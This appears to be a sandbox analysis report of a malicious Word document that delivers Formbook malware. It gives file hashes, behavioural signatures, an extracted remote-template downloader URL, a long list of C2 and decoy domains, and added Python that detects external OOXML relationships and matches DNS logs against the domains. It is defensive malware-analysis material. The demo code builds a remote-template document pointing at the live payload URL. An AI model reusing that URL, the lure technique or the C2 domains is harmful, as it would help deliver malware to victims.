General
Target: Sample.docx.doc
Size: 10KB
Sample: 230126-jzz2nsda72
MD5: 884bf256520434bf9bdbd7a760176961
SHA1: 2c79b5ca06f153b41a93d8ace4a7713d59621d9d
SHA256: 574fce61f6fcf5e16be3fd8a77a56aeeb4d7a8868e2dccd0225c9c8c426e2913
SHA512: 8216274591743f8f995cfa39753fb06f656d04fb676cde84d28f722adf3bcbe55330639344a898e37576dc71397b0743ecf83cbdbbc6d1c0a85596ee68bb92bd
SSDEEP: 192:ScIMmtP8ar5G/bfIdTO3e/YnamWBX8ex6y3slZ:SPXt4ATO9nosMsH
Static task: static1
Behavioral task: behavioral1 (Sample: Sample.docx, Resource: win7-20221111-en)
Behavioral task: behavioral2 (Sample: Sample.docx, Resource: win10v2004-20220812-en)
Malware Config
Extracted (downloader URL)
http://000000001000000000000020000000000001000000000@104.168.46.125/fresh/qwsdffhfhcvxcdgdfhfgjfjfgdfdfgxcvcxv.doc
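That URL is easy to misread: everything before the @ is the userinfo component of the URL, and the host the client actually connects to is 104.168.46.125. The Python below is an added example, not part of the sandbox output or of the sample, showing how to pull external relationships (the remote-template link that the "Abuses OpenXML format to download file from external location" signature refers to) out of an OOXML document and resolve the real host of each target. It builds a demo .docx in memory; the part name and relationship type it uses (word/_rels/settings.xml.rels carrying an attachedTemplate with TargetMode="External") are the standard remote-template layout and are an assumption here, since the report does not state which relationship the sample used. The target URL is the one extracted above.

```python
"""Added example: list external relationships in an OOXML package and report
the host each target really points at. Demo artefact, not the original sample."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# URL the sandbox extracted from the sample (Malware Config section).
EXTRACTED_URL = "http://000000001000000000000020000000000001000000000@104.168.46.125/fresh/qwsdffhfhcvxcdgdfhfgjfjfgdfdfgxcvcxv.doc"


def build_demo_docx(template_url: str) -> bytes:
    """Build a minimal .docx whose settings part points at an external template.
    Assumed layout (settings.xml.rels + attachedTemplate); not the real sample."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", f'<w:document xmlns:w="{WML_NS}"/>')
        z.writestr("word/settings.xml", f'<w:settings xmlns:w="{WML_NS}"/>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(doc_bytes: bytes):
    """Return (part, relationship type, target) for every relationship with
    TargetMode="External", across all .rels parts in the package. Works on the
    bytes, so a .docx renamed to .doc (as this sample was) is handled the same."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def real_host(url: str) -> str:
    """Host the client will connect to. Anything before '@' is userinfo; the
    sample pads it with digits so the IP address is easy to overlook."""
    return urlsplit(url).hostname or ""


def triage_document(doc_bytes: bytes):
    """Summarise each external relationship with its true host and userinfo."""
    rows = []
    for part, rel_type, target in external_relationships(doc_bytes):
        rows.append({
            "part": part,
            "type": rel_type,
            "target": target,
            "host": real_host(target),
            "userinfo": urlsplit(target).username or "",
        })
    return rows


if __name__ == "__main__":
    for row in triage_document(build_demo_docx(EXTRACTED_URL)):
        print(f"{row['part']}: {row['type']} -> host {row['host']} "
              f"(userinfo {row['userinfo']!r})")
```

To run it against a real file, pass the file's bytes to triage_document; because the check walks every .rels part rather than one known path, it also surfaces external OLE objects and hyperlink-style relationships elsewhere in the package, and it does not depend on the file extension.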
Extracted (Formbook)
Family: formbook
Version: 4.1
Campaign: w12e
Domains (C2 and decoys):
poshsalon.co.uk
ideeksha.net
eaglebreaks.com
exileine.me.uk
saveittoday.net
ceon.tech
estateagentswebsitedesign.uk
faropublicidade.com
depression-treatment-83678.com
informationdata16376.com
wirecreations.africa
coolsculpting-pros.life
ethoshabitats.com
amtindividual.com
gotoken.online
cherny-100-imec-msu.ru
historicaarcanum.com
gpsarhealthcare.com
kx1257.com
abdullahbinomar.com
utrem.xyz
khangkiencharcoal.com
fabvance-demos.online
jima68.com
1206b.com
guardianshipattorneyhouston.com
imziii.com
gaya-zohar.com
affluencegroup.net
xn--l3cj0azbal8cf5kobm.net
apogeebk.com
kwaranewsupdate.africa
buatosh.top
thenextlevelup.net
kristianstadspelforening.se
excertesi.com
swcctv.co.uk
actiontoyhouse.com
eisenhowerloan.com
brightupproduce.com
lojaedesign.com
kecheblog.com
vigilant-e.africa
internationaltaekwondo.net
annabenedetto.com
eboomp.pics
groupeverlaine.app
ebwwn.com
grasshopperspirit.online
getsafu.com
car-deals-75816.com
roddgunnstore.online
aiako.pro
homasp.club
bingo1818.xyz
work2050.co.uk
itgroup1.online
beyou-us.com
forthewitches.biz
felue.com
macroapi.net
hsfinancialservice.com
eoresla.club
alloahucondos.com
hkifarm.com
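To turn the domain list into a detection, the following is an added example (not part of the sandbox report) that scans DNS query logs for the configured domains, matching on whole labels so that subdomains are caught and look-alike names such as notposhsalon.co.uk are not. The log lines are constructed for the demo, and FORMBOOK_DOMAINS holds only the first six entries from the list above; paste in the full list when using it. Formbook configs mix the live C2 with decoy domains, some of which are legitimate sites, so a hit is a lead to correlate with process and network activity, not a verdict on its own.

```python
"""Added example: flag DNS queries for domains in the extracted Formbook config.
Log lines are constructed; the domain set is a subset of the config above."""
from typing import Optional

# First six entries of the extracted domain list (paste in the full list).
FORMBOOK_DOMAINS = {
    "poshsalon.co.uk",
    "ideeksha.net",
    "eaglebreaks.com",
    "exileine.me.uk",
    "saveittoday.net",
    "ceon.tech",
}

# Constructed DNS log, one query per line: "<timestamp> <client> <qname> <qtype>".
SAMPLE_DNS_LOG = """\
2023-01-26T10:00:01Z 10.0.0.15 www.poshsalon.co.uk A
2023-01-26T10:00:02Z 10.0.0.15 notposhsalon.co.uk. A
2023-01-26T10:00:03Z 10.0.0.22 Ideeksha.NET. A
2023-01-26T10:00:04Z 10.0.0.22 example.com A
2023-01-26T10:00:05Z 10.0.0.31 tech A
"""


def normalize(qname: str) -> str:
    """Lower-case and drop the trailing dot that resolvers often log."""
    return qname.rstrip(".").lower()


def match_c2(qname: str, domains=FORMBOOK_DOMAINS) -> Optional[str]:
    """Return the configured domain that qname equals or is a subdomain of.

    Comparing whole labels (walking from the full name to its parents)
    means notposhsalon.co.uk does not match poshsalon.co.uk, while
    www.poshsalon.co.uk does.
    """
    labels = normalize(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def scan_dns_log(log_text: str, domains=FORMBOOK_DOMAINS):
    """Return (timestamp, client, normalized qname, matched domain) per hit."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than failing the whole scan
        ts, client, qname, _qtype = parts[:4]
        matched = match_c2(qname, domains)
        if matched:
            hits.append((ts, client, normalize(qname), matched))
    return hits


if __name__ == "__main__":
    for ts, client, qname, matched in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{ts} {client} queried {qname} (config domain {matched})")
```

Two of the five constructed queries hit: the www. subdomain of poshsalon.co.uk and the mixed-case, dot-terminated ideeksha.net; the look-alike and the bare "tech" label do not, which is the behaviour a plain substring match would get wrong.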
Targets
Target: Sample.docx.doc
Size: 10KB
Signatures
- Formbook payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Executes dropped EXE
- Abuses OpenXML format to download file from external location (see the URL extracted under Malware Config)
- Loads dropped DLL
- Uses the VBS compiler for execution
- Suspicious use of SetThreadContext